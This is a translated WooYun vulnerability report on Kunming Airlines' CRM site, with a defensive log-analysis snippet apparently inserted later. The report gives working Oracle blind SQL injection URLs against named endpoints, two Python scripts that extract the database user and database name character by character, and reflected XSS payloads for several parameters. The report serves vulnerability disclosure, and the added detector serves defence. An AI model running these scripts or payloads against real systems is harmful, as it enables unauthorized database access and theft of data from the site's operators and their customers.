Vulnerability summary

Defect ID: wooyun-2016-0194976

Title: Kunming Airlines, multiple Oracle blind SQL injections (with script) & reflected XSS, bundled

Vendor: Kunming Airlines

Author: V1ct0r

Submitted: 2016-04-11 14:37

Fixed: 2016-05-26 15:10

Disclosed: 2016-05-26 15:10

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or assistance contact [email protected]


Vulnerability details

Disclosure status:

2016-04-11: Details sent to the vendor, awaiting vendor handling
2016-04-11: Vendor confirmed; details visible to the vendor only
2016-04-21: Details disclosed to core white hats and domain experts
2016-05-01: Details disclosed to regular white hats
2016-05-11: Details disclosed to intern white hats
2016-05-26: Details disclosed to the public

Brief description:

I once crossed mountains and seas,
and pushed through crowds of people.
Everything I once had
scattered like smoke in the blink of an eye.
I was once lost, disappointed, lost all direction,
until I saw that the ordinary is the only answer.

Detailed description:

Site: http://crm.airkunming.com/
0x00 Blind SQL injection (boolean-based blind)
SQLi_1_1 (dstCity parameter in the mileage accrual query)
Payload:

http://crm.airkunming.com/cal/consumecal?dstCity=-1%27%20OR%203*2*1=6%20AND%20000477=000477%20or%20%27X2bE5JjB%27=%27&memberlevel=01&orgCity=CGO&seatclass=L


Taking this injection point as an example, a Python script is used to retrieve data.
1) First, read the length of the current database user name:

length(SYS_CONTEXT('USERENV','CURRENT_USER'))=13


Construct:

http://crm.airkunming.com/cal/consumecal?dstCity=-1' OR 3*2*1=6 AND 000477=000477 AND length(SYS_CONTEXT('USERENV','CURRENT_USER'))=n or 'X2bE5JjB'='&memberlevel=01&orgCity=CGO&seatclass=L


For the =n at the end we try values starting from 1; when n=8 the response is true.

[Screenshot: sqli01.png]

[Screenshot: sqli02.png]


This establishes that the database user name is 8 characters long.
2) Python script

import httplib
import string
import urllib

headers = {
    'Content-Type': 'application/x-www-form-urlencoded',
    'Cookie': '',
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21',
}

# Candidate characters: letters and digits
payloads = list(string.ascii_lowercase)
payloads += list(string.ascii_uppercase)
for i in range(0, 10):
    payloads.append(str(i))

print '***********************StarT Retrieving NoW***********************'
user = ''
# The user name was found to be 8 characters long; test one position at a time
for i in range(1, 9, 1):
    for payload in payloads:
        conn = httplib.HTTPConnection('crm.airkunming.com', timeout=300)
        parameters = {
            'dstCity': "-1' OR 3*2*1=6 AND 000477=000477 AND ascii(substr(SYS_CONTEXT('USERENV','CURRENT_USER'),%s,1))=%s or 'X2bE5JjB'='" % (i, ord(payload)),
            'memberlevel': '01',
            'orgCity': 'CGO',
            'seatclass': 'L',
        }
        conn.request(method='POST',
                     url='/cal/consumecal',
                     headers=headers,
                     body=urllib.urlencode(parameters))
        content = conn.getresponse().read()
        conn.close()
        print '*',
        # A true condition is recognised by the marker '0' appearing in the response
        if '0' in content:
            user += payload
            print '\n[Retrieving]', user
            break
print '\nCurrent Oracle user is', user


[Screenshot: sqli03res.png]


The user name retrieved is: FFPENTER
Next we can also look at the database name:

http://crm.airkunming.com/cal/consumecal?dstCity=-1%27%20OR%203*2*1=6%20AND%20000477=000477%20AND%20length%28SYS_CONTEXT%28%27USERENV%27,%27db_name%27%29%29=5%20or%20%27X2bE5JjB%27=%27&memberlevel=01&orgCity=CGO&seatclass=L


Constructing the query shows that the database name is 5 characters long.

[Screenshot: sqli04.png]


Only a small change to the script above is needed:

#encoding=gbk
import httplib
import string
import urllib

headers = {
    'Content-Type': 'application/x-www-form-urlencoded',
    'Cookie': '',
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21',
}

# Candidate characters: letters and digits
payloads = list(string.ascii_lowercase)
payloads += list(string.ascii_uppercase)
for i in range(0, 10):
    payloads.append(str(i))

print '***********************StarT Retrieving NoW***********************'
dbname = ''
# The database name was found to be 5 characters long; test one position at a time
for i in range(1, 6, 1):
    for payload in payloads:
        conn = httplib.HTTPConnection('crm.airkunming.com', timeout=300)
        parameters = {
            'dstCity': "-1' OR 3*2*1=6 AND 000477=000477 AND ascii(substr(SYS_CONTEXT('USERENV','db_name'),%s,1))=%s or 'X2bE5JjB'='" % (i, ord(payload)),
            'memberlevel': '01',
            'orgCity': 'CGO',
            'seatclass': 'L',
        }
        conn.request(method='POST',
                     url='/cal/consumecal',
                     headers=headers,
                     body=urllib.urlencode(parameters))
        content = conn.getresponse().read()
        conn.close()
        print '*',
        # A true condition is recognised by the marker '0' appearing in the response
        if '0' in content:
            dbname += payload
            print '\n[Retrieving]', dbname
            break
print '\nOracle DB_name is', dbname


[Screenshot: dbname.png]


Continuing with the same method we can also obtain HOST\IP information and so on (see: http://www.myhack58.com/Article/html/3/7/2011/29138.htm):

[Screenshot: host.png]
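From the defending side, the character-by-character probing performed by the scripts above leaves a recognisable trail in the web server's access log: many requests to the same endpoint that differ only in the substr position and the compared character code. The detector below is an added example and not part of the report; the log format, client addresses and burst threshold are assumptions, and the sample log lines are constructed to mirror the page's probes (a POST body as used by the scripts would not appear in a standard access log, so the sample uses GET requests).

```python
import re
from collections import defaultdict
from urllib.parse import quote, unquote_plus, urlsplit

# Indicators taken from the probes on this page: Oracle SYS_CONTEXT lookups,
# ascii(substr(...)) character tests and the "OR 3*2*1=6 AND n=n" tautology.
PROBE_RE = re.compile(
    r"SYS_CONTEXT\s*\(|ascii\s*\(\s*substr\s*\(|\bOR\s+\d+\*\d+\*\d+\s*=\s*\d+",
    re.IGNORECASE)
# The two numbers that change between steps of a blind extraction:
# the position and the compared code in ascii(substr(x, POS, 1)) = CODE.
VARIANT_RE = re.compile(r"(,\s*)\d+(\s*,\s*1\s*\)\s*\)\s*=\s*)\d+")
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')

def decode_request(line):
    """Return (client_ip, path, URL-decoded query) for one access-log line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, target = m.groups()
    parts = urlsplit(target)
    return ip, parts.path, unquote_plus(parts.query)

def analyse(lines, burst_threshold=5):
    """Count probe requests; report (ip, path) pairs whose probes differ only in POS/CODE."""
    probe_requests = 0
    variants = defaultdict(set)
    for line in lines:
        rec = decode_request(line)
        if rec is None or not PROBE_RE.search(rec[2]):
            continue
        ip, path, query = rec
        probe_requests += 1
        variants[(ip, path, VARIANT_RE.sub(r"\1N\2N", query))].add(query)
    bursts = [(ip, path, len(qs)) for (ip, path, _), qs in variants.items()
              if len(qs) >= burst_threshold]
    return {"probe_requests": probe_requests, "extraction_bursts": bursts}

# Constructed sample log (not from the report): six steps testing the first
# character of CURRENT_USER against codes 65..70, plus one legitimate lookup.
def _probe_line(code):
    q = quote("-1' OR 3*2*1=6 AND 000477=000477 AND ascii(substr(SYS_CONTEXT("
              "'USERENV','CURRENT_USER'),1,1))=%d or 'X2bE5JjB'='" % code)
    return ('198.51.100.7 - - [11/Apr/2016:14:37:01 +0800] "GET /cal/consumecal'
            '?dstCity=%s&memberlevel=01&orgCity=CGO&seatclass=L HTTP/1.1" 200 512' % q)

SAMPLE_LOG = [_probe_line(c) for c in range(65, 71)] + [
    '203.0.113.5 - - [11/Apr/2016:14:37:09 +0800] "GET /cal/consumecal'
    '?dstCity=SZX&memberlevel=01&orgCity=CGO&seatclass=L HTTP/1.1" 200 512']
```

Running `analyse(SAMPLE_LOG)` reports six probe requests and one extraction burst from 198.51.100.7 against /cal/consumecal; the single legitimate lookup matches nothing.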


SQLi_1_2 (orgCity parameter in the mileage query)
Payload (true condition):

http://crm.airkunming.com/cal/consumecal?dstCity=CGO&memberlevel=01&orgCity=-1%27%20OR%203*2*1=6%20AND%20000125=000125%20or%20%27Ad42Wpqc%27=%27&seatclass=L

[Screenshot: sqli03.png]

Payload (false condition):

http://crm.airkunming.com/cal/consumecal?dstCity=CGO&memberlevel=01&orgCity=-1%27%20OR%203*2*1=6%20AND%20000125=000126%20or%20%27Ad42Wpqc%27=%27&seatclass=L

[Screenshot: sqli04.png]

SQLi_2_1 (dstCity parameter in the mileage redemption query)
Payload (true condition):

http://crm.airkunming.com/cal/convertPoint?converttype=02&dstCity=-1%27%20OR%203*2*1%3d6%20AND%20000762%3d000762%20or%20%279SMhIilt%27%3d%27&orgCity=CGO&seatclass=O&upclass=O

[Screenshot: sqli05.png]

Payload (false condition):

http://crm.airkunming.com/cal/convertPoint?converttype=02&dstCity=-1%27%20OR%203*2*1=6%20AND%20000762=000763%20or%20%279SMhIilt%27=%27&orgCity=CGO&seatclass=O&upclass=O

[Screenshot: sqli06.png]

SQLi_2_2 (orgCity parameter in the mileage redemption query)
Payload (true condition):

http://crm.airkunming.com/cal/convertPoint?converttype=02&dstCity=CGO&orgCity=-1%27%20OR%203*2*1%3d6%20AND%20000111%3d000111%20or%20%27g1nxDILy%27%3d%27&seatclass=O&upclass=O

[Screenshot: sqli07.png]

Payload (false condition):

http://crm.airkunming.com/cal/convertPoint?converttype=02&dstCity=CGO&orgCity=-1%27%20OR%203*2*1=6%20AND%20000111=000112%20or%20%27g1nxDILy%27=%27&seatclass=O&upclass=O

[Screenshot: sqli08.png]


0x01 Reflected XSS
XSS1 (cardtype) Payload:

http://crm.airkunming.com/comm/vip?cardtype=11%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28/V1ct0r/%29%3C/ScRiPt%3E

[Screenshot: xss1.png]

XSS2 (orderNo) Payload:

http://crm.airkunming.com/pay/payCompleteLoading?orderNo=1%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(/V1ct0r/)%3C/ScRiPt%3E

[Screenshot: xss2.png]

XSS3 (dstCity) http://crm.airkunming.com/convert/loading POST data:

dstCity=SZX%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(/V1ct0r/)%3C/ScRiPt%3E&dstCityLabel=%e4%b8%ad%e6%96%87/%e6%8b%bc%e9%9f%b3&flightDates=&flightType=DC&orgCity=&orgCityLabel=%e4%b8%ad%e6%96%87/%e6%8b%bc%e9%9f%b3

[Screenshot: xss3.png]

The same issue also exists in the flightDates/flightType/orgCity POST parameters of http://crm.airkunming.com/convert/loading; they are not demonstrated one by one here.

Proof of vulnerability:

As above.

Remediation:

Filtering.

Copyright notice: when republishing, please credit the source: V1ct0r@WooYun


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 18

Confirmed: 2016-04-11 15:01

Vendor reply:

Thank you for your attention to Kunming Airlines; we will arrange to handle this as soon as possible.

Latest status:

None yet.


Comments:

  1. 2016-04-11 15:27 | 牛肉包子 ( regular white hat | Rank:307 vulnerabilities:70 | baozisec)

    Awesome.

  2. 2016-04-11 15:46 | V1ct0r ( regular white hat | Rank:361 vulnerabilities:76 | Life is more than the daily grind; there is also hacking and the far horizon.)

    @牛肉包子 Big brother, take me flying >﹏<